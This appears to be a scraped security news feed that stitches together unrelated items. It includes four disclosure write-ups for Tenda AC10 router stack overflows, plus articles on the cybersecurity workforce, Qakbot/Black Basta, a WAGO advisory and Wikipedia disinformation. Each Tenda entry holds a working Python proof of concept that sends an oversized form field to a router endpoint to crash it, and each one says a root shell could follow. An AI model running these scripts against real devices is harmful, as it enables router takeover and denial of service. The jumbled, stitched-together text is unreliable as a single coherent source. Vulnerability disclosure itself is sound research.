Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/saveParentControlInfo.

Permalink

Cannot retrieve contributors at this time

**Tenda AC10V15.03.06.23 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2734.html
    

**Affected version**

**Vulnerability details**

/goform/saveParentControlInfo, In saveParentControlInfo, deviceName and deviceId are controllable and will be passed into the set\_device\_name function. In the set\_device\_name function, dev\_name will be spliced into mib\_vlaue by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'deviceId=1&deviceName=' + p1

p3 \= b"POST /goform/saveParentControlInfo" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-42171: IOT_Vul/readme.md at main · z1r00/IOT_Vul

A cross-disciplinary effort of change is needed to attract new professionals in the coming decade.

In 2010, the Center for Strategic and International Studies (CSIS) published the report "A Human Capital Crisis in Cybersecurity," which noted "there are about 1,000 security people in the US who have the specialized security skills to operate effectively in cyberspace. We need 10,000 to 30,000."

Twelve years later, the Cyberspace Solarium Commission 2.0 Workforce Development Agenda for the National Cyber Director observed that "in the United States, there are almost 600,000 open cybersecurity jobs across the private sector and federal, state, and local governments — a remarkable gap considering that the field currently employs just over a million professionals." This is not an encouraging trend.

**Stakeholders Who Have the Power**

To effect multigenerational change, there are four distinct groups of stakeholders that have the power to best address a problem that has existed for over a decade.

**Cybersecurity buyers** should generally stop buying point solutions and instead focus on a strategy of long-term consolidation of technical cybersecurity capabilities. Although the latest shift-left-zero-trust-artificial-intelligence-XDR-machine-learning "solution" may provide comprehensive coverage against the latest techniques from an advanced persistent threat, it's meaningless unless your organization has actual proof of engagement by an advanced persistent threat (APT) that uses those techniques. Each new point solution has a training and operations burden, typically a minimum of two people who must learn to design and operate the solution.

Unfortunately, each new solution also needs to be integrated into the organization's existing security stack, which takes precious time and resources, and where visibility failures may provide coverage for threat actors to hide. By comparison, an integrated security stack might not immediately cover every conceivable technology threat permutation, but it will take fewer human resources to own and operate, and those staff tasked with operations will have in-depth knowledge as a result.

**HR professionals** should de-emphasize the importance of certifications for interns and junior and midcareer professionals and instead focus on on-the-job training and clearly defined career paths for cybersecurity professionals. The issue with certifications has existed since before CSIS in 2010 observed, "It is the consensus of the Commission that the current professional certification regime is not merely inadequate; it creates a dangerously false sense of security." Part of the reason for the workforce gap is the sheer number of entry-level job postings that require certifications; the specificity of the job descriptions also has been repeatedly shown to discourage otherwise-qualified women and minorities from even applying.

Retaining cybersecurity professionals is similarly difficult, as many junior and midcareer professionals will change jobs every two to five years to gain expertise with new technologies and additional security domains. Both hiring and retention can be managed effectively with well-defined career paths for cybersecurity professionals, such as those defined by the National Institute of Standards and Technology's (NIST) National Initiative for Cybersecurity Education (NICE) program. When supplemented by paid training from employers, employees are more likely to stay, which further reduces the cybersecurity skills gap.

**Compliance professionals** should be aware that their security counterparts are continuously overextended and seek to automate as many compliance operations as feasible. When responding to an internal assessment or an external audit, compliance professionals regularly rely on the security team to collect evidence of internal control operation and effectiveness. Realistically, this is an "extra" job duty on the part of security professionals, and as such, these tasks may be done in a rush or put off to the last minute, due to the more pressing duties on their limited time. These activities include manual tasks such as taking a screenshot of the password policy and saving it in a defined location or creating a PDF report showing that all hard drives are encrypted. As these compliance activities do not require creativity or intuition, they are prime opportunities for automation, which will lessen the time burden on security professionals. This may also result in a positive change in budgetary priorities, as an organization that has automated many compliance operations can hire additional security staff rather than additional compliance staff.

**Individual cybersecurity professionals** should reach out to middle schools and high schools to find opportunities to speak to young people about their jobs. A persistent misconception in secondary education is that cybersecurity jobs require a programming background, yet most cybersecurity jobs require no expertise in programming. Individual contributors across all disciplines — including sales, marketing, UX design, customer success, DFIR, and red teamers — should try to speak to one secondary school audience about what they do, why they love their job, and how their job has a middle-class salary that likely only required a two-year degree. That last part will resonate with many secondary school students and their parents who are considering how long it may take to pay off a four-year university degree.

Despite there not being a single solution to solving the cybersecurity workforce gap, there are reasons to be hopeful. The cybersecurity community attracts people who like working in teams and sharing their knowledge and experiences. A cross-disciplinary effort of behavioral changes across stakeholders based on shared values may be our best solution moving forward for the next decade.

4 Stakeholders Critical to Addressing the Cybersecurity Workforce Gap

Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/formSetDeviceName.

Permalink

Cannot retrieve contributors at this time

**Tenda AC10V15.03.06.23 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2734.html
    

**Affected version**

**Vulnerability details**

/goform/SetDeviceName, Called set\_device\_name in formSetDeviceName, dev\_name, dev\_id are both controllable

In set\_device\_name, dev\_name will be spliced into sprintf, it is worth noting that the size is not checked, resulting in a stack overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x300
p2 \= b'dev\_id=1&devName=' + p1

p3 \= b"POST /goform/SetDeviceName" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111; curShow=; ac\_login\_info=passwork; test=A" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-42165: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/formSetClientState.

Permalink

**Tenda AC10V15.03.06.23 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2734.html
    

**Affected version**

**Vulnerability details**

/goform/SetClientState， The two variables ul\_speed and dl\_speed are user-controllable and will be spliced into the buff by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x300
p2 \= b'limitEn=1&deviceId=a&limitSpeedUp=a&limitSpeed=' + p1

p3 \= b"POST /goform/SetClientState" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-42164: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/fromNatStaticSetting.

Permalink

**Tenda AC10V15.03.06.23 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2734.html
    

**Affected version**

**Vulnerability details**

/goform/NatStaticSetting, It can be seen that the page is controlled by the user, and will be spliced into the gotopage with sprintf. It is worth noting that there is no size limit to cause stack overflow.

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x300
p2 \= b'page=' + p1

p3 \= b"POST /goform/NatStaticSetting" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-42163: IOT_Vul/readme.md at main · z1r00/IOT_Vul

The threat actors behind the Black Basta ransomware family have been observed using the Qakbot trojan to deploy the Brute Ratel C4 framework as a second-stage payload in recent attacks.
The development marks the first time the nascent adversary simulation software is being delivered via a Qakbot infection, cybersecurity firm Trend Micro said in a technical analysis released last week.
The

The threat actors behind the Black Basta ransomware family have been observed using the Qakbot trojan to deploy the Brute Ratel C4 framework as a second-stage payload in recent attacks.

The development marks the first time the nascent adversary simulation software is being delivered via a Qakbot infection, cybersecurity firm Trend Micro said in a technical analysis released last week.

The intrusion, achieved using a phishing email containing a weaponized link pointing to a ZIP archive, further entailed the use of Cobalt Strike for lateral movement.

While these legitimate utilities are designed for conducting penetration testing activities, their ability to offer remote access has made them a lucrative tool in the hands of attackers looking to stealthily probe the compromised environment without attracting attention for extended periods of time.

This has been compounded by the fact that a cracked version of Brute Ratel C4 began circulating last month across the cybercriminal underground, prompting its developer to update the licensing algorithm to make it harder to crack.

Qakbot, also called QBot and QuackBot, is an information stealer and banking trojan that's known to be active since 2007. But its modular design and its ability to act as a downloader has turned it into an attractive candidate for dropping additional malware.

According to Trend Micro, the ZIP file in the email contains an ISO file, which, in turn, includes a LNK file that fetches the Qakbot payload, illustrating attempts on part of threat actors to adapt to other tactics in the aftermath of Microsoft's decision to block macros by default for documents downloaded from the web.

The Qakbot infection is succeeded by the retrieval of Brute Ratel and Cobalt Strike, but not before performing automated reconnaissance through built-in command line tools such as arp, ipconfig, nslookup, netstat, and whoami.

The attack, however, was stopped before any malicious action could be taken by the threat actor, although it's suspected that the end goal may have been domain-wide ransomware deployment.

In another Qakbot execution chain spotted by the cybersecurity company, the ZIP file is delivered through an increasingly popular method called HTML smuggling, resulting in the execution of Brute Ratel C4 as the second-stage.

"The Qakbot-to-Brute Ratel-to-Cobalt Strike kill chain is associated with the group behind the Black Basta Ransomware," the researchers said. "This is based on overlapping TTPs and infrastructure observed in Black Basta attacks."

The findings coincide with a resurgence of Qakbot attacks in recent months by means of a variety of techniques like HTML file attachments, DLL side-loading, and email thread hijacking, the last of which entailed harvesting emails in bulk from successful ProxyLogon attacks aimed at Microsoft Exchange servers.

**IcedID Actors Diversify Delivery Methods**

Qakbot is far from the only access-as-a-service malware that's being increasingly distributed via ISO and other file formats to get around macro restrictions, for Emotet, IcedID, and Bumblebee campaigns have all followed similar trajectories.

Palo Alto Networks Unit 42, in late September 2022, said it discovered a malicious polyglot Microsoft Compiled HTML Help (CHM) file being used to deliver the IcedID (aka BokBot) malware.

Other prominent delivery methods and infection pathways have involved the use of password-protected ZIP files containing an ISO file, mirroring that of Qakbot, with the payload propagated through a pay-per-installer service known as PrivateLoader, according to Team Cymru.

And, to top it all, Emotet appears to be readying for a fresh set of attacks after a short three-month hiatus to rework its "systeminfo" module to "improve targeting of specific victims and distinguish tracking bots from real users," ESET disclosed in a series of tweets.

"We have not seen new spam waves from Emotet since July," Jean-Ian Boutin, director of threat research at ESET, told The Hacker News. "It is not clear why that is."

"They did take some breaks in the past, but never for that long. Perhaps this new module means that they are testing modules and will be active again in the near future, but this of course is speculation."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Black Basta Ransomware Hackers Infiltrates Networks via Qakbot to Deploy Brute Ratel C4

A vulnerability classified as critical has been found in Linux Kernel. This affects the function spl2sw_nvmem_get_mac_address of the file drivers/net/ethernet/sunplus/spl2sw_driver.c of the component BPF. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier VDB-211041 was assigned to this vulnerability.

CVE-2022-3541

Categories: News
Tags: a week in security

Tags:  week in security

Tags:  AI Bill of Rights

Tags:  Final Fantasy XIV

Tags:  Lock and Code S03E21

Tags:  Meta

Tags:  WhatsApp

Tags:  ransomware

Tags:  tax scam

Tags:  Chinese APT

Tags:  Android

Tags:  Chrome

Tags:  iOS

Tags:  managed detection response

Tags:  MDR

Tags:  disinformation

Tags:  FBI

Tags:  CISA

The most important and interesting computer security stories from the last week.



(Read more...)




The post A week in security (October 10 - 16) appeared first on Malwarebytes Labs.

twitter

facebook

linkedin

Youtube

instagram

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows

Mac

iOS

Android

Privacy VPN

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (October 10 - 16)

WAGO Series PFC100/PFC200, Series Touch Panel 600, Compact Controller CC100 and Edge Controller in multiple versions are prone to a loss of MAC-Address-Filtering after reboot. This may allow an remote attacker to circumvent the reach the network that should be protected by the MAC address filter.

2022-10-17 10:00 (CEST) VDE-2022-042  

**WAGO: Multiple products - Loss of MAC-Address-Filtering after reboot**  
Share: Email | Twitter  

**Published**

2022-10-17 10:00 (CEST)

**Last update**

2022-10-14 14:43 (CEST)

**Vendor(s)**

WAGO GmbH & Co. KG  

**Product(s)**

Article No°

Product Name

Affected Version(s)

750-81xx/xxx-xxx

Series WAGO PFC100/PFC200

03.01.07(13) <= 03.10.08(22)

750-8217/xxx-xxx

Series WAGO PFC100/PFC200

03.04.10(16) <= 03.10.08(22)

750-82xx/xxx-xxx

Series WAGO PFC100/PFC200

03.01.07(13) <= 03.10.08(22)

762-4xxx

Series WAGO Touch Panel 600

03.01.07(13) <= 03.10.09(22)

762-5xxx

Series WAGO Touch Panel 600

03.01.07(13) <= 03.10.09(22)

762-6xxx

Series WAGO Touch Panel 600

03.01.07(13) <= 03.10.09(22)

751-9301

WAGO Compact Controller CC100

03.07.17(19) <= 03.09.08(21)

752-8303/8000-002

WAGO Edge Controller

03.06.09(18) <= 03.10.09(22)

**Summary**

The MAC address filter as part of the firewall has a flaw, which prevents the MAC address filter to be active after restart. In this way a remote attacker is able to circumvent the MAC address filtering after a reboot of a device.

**CVE ID**

**Severity**

**Weakness**

Expected Behavior Violation  (CWE-440) 

**Summary**

WAGO Series PFC100/PFC200, Series Touch Panel 600, Compact Controller CC100 and Edge Controller in multiple versions are prone to a loss of MAC-Address-Filtering after reboot. This may allow an remote attacker to circumvent the reach the network that should be protected by the MAC address filter.

**Source**

**Impact**

Exploiting this flaw, an remote attacker is able to reach the network which should be protected by the MAC address filter.

**Solution**

**Mitigation**

Reactivate MAC Address Filter after restart to make sure MAC Address Filter is working. To test if the MAC Address Filter is working just add a test-client to the MAC Address Filter list, enable it and check if you can access the web-based-management via the test-client.

**Solution**

We recommend all effected users to update to the firmware version listed below:

**Series WAGO PFC100/PFC200 and WAGO Compact Controller CC100**

Article Number

Fixed Firmware

750-81xx/xxx-xxx

\>= 03.10.10(22)

750-8217/xxx-xxx

\>= 03.10.10(22)

750-82xx/xxx-xxx

\>= 03.10.10(22)

751-9301

\>= 04.01.10(23)

**Series WAGO Touch Panel 600 and WAGO Edge Controller**

Article Number

Fixed Firmware

762-4xxx

\>= 03.10.10(22)

762-5xxx

\>= 03.10.10(22)

762-6xxx

\>= 03.10.10(22)

752-8303/8000-002

\>= 03.10.10(22)

**Reported by**

CERT@VDE coordinated with WAGO

CVE-2022-3281: VDE-2022-042 | CERT@VDE

Custodians of the crowdsourced encyclopedia are charged with protecting it from state-sponsored manipulators. A new study reveals how.

This network mapping may also identify a particular strategy used by bad actors of splitting their edit histories between a number of accounts to evade detection. The editors put in the effort to build reputation and status within the Wikipedia community, mixing legitimate page edits with the more politically sensitive ones.

“The main message that I have taken away from all of this is that the main danger is not vandalism. It's entryism,” Miller says.

If the theory is correct, however, it means that it could also take years of work for state actors to mount a disinformation campaign capable of slipping by unnoticed.

“Russian influence operations can be quite sophisticated and go on for a long time, but it's unclear to me whether the benefits would be that great,” says O’Neil.

Governments also often have more blunt tools at their disposal. Over the years, authoritarian leaders have blocked the site, taken its governing organization to court, and arrested its editors.

Wikipedia has been battling inaccuracies and false information for 21 years. One of the most long-running disinformation attempts went on for more than a decade after a group of ultra-nationalists gamed Wikipedia’s administrator rules to take over the Croatian-language community, rewriting history to rehabilitate World War II fascist leaders of the country. The platform has also been vulnerable to “reputation management” efforts aimed at embellishing powerful people’s biographies. Then there are outright hoaxes. In 2021, a Chinese Wikipedia editor was found to have spent years writing 200 articles of fabricated history of medieval Russia, complete with imaginary states, aristocrats, and battles.

To fight this, Wikipedia has developed a collection of intricate rules, governing bodies, and public discussion forums wielded by a self-organizing and self-governing body of 43 million registered users across the world.

Nadee Gunasena, chief of staff and executive communications at the Wikimedia Foundation, says the organization “welcomes deep dives into the Wikimedia model and our projects,” particularly in the area of disinformation. But she also adds that the research covers only a part of the article’s edit history.

“Wikipedia content is protected through a combination of machine learning tools and rigorous human oversight from volunteer editors,” says Gunasena. All content, including the history of every article, is public, while sourcing is vetted for neutrality and reliability.

The fact that the research focused on bad actors who were already found and rooted out may also show that Wikipedia’s system is working, adds O’Neil. But while the study did not produce a “smoking gun,” it could be invaluable to Wikipedia: “The study is really a first attempt at describing suspicious editing behavior so we can use those signals to find it elsewhere,” says Miller.

Victoria Doronina, a member of the Wikimedia Foundation’s board of trustees and a molecular biologist, says that Wikipedia has historically been targeted by coordinated attacks by “cabals” that aim to bias its content.

“While individual editors act in good faith, and a combination of different points of view allows the creation of neutral content, off-Wiki coordination of a specific group allows it to skew the narrative,” she says. If Miller and its researchers are correct in identifying state strategies for influencing Wikipedia, the next struggle on the horizon could be “Wikimedians versus state propaganda,” Doronina adds.

The analyzed behavior of the bad actors, Miller says, could be used to create models that can detect disinformation and find how just how vulnerable the platform is to the forms of systematic manipulation that have been exposed on Facebook, Twitter, YouTube, Reddit, and other major platforms.

The English-language edition of Wikipedia has 1,026 administrators monitoring over 6.5 million pages, the most articles of any edition. Tracking down bad actors has mostly relied on someone reporting suspicious behavior. But much of this behavior may not be visible without the right tools. In terms of data science, it's difficult to analyze Wikipedia data because, unlike a tweet or a Facebook post, Wikipedia has many versions of the same text.

As Miller explains it, “a human brain just simply can't identify hundreds of thousands of edits across hundreds of thousands of pages to see what the patterns are like.”

Tag

#mac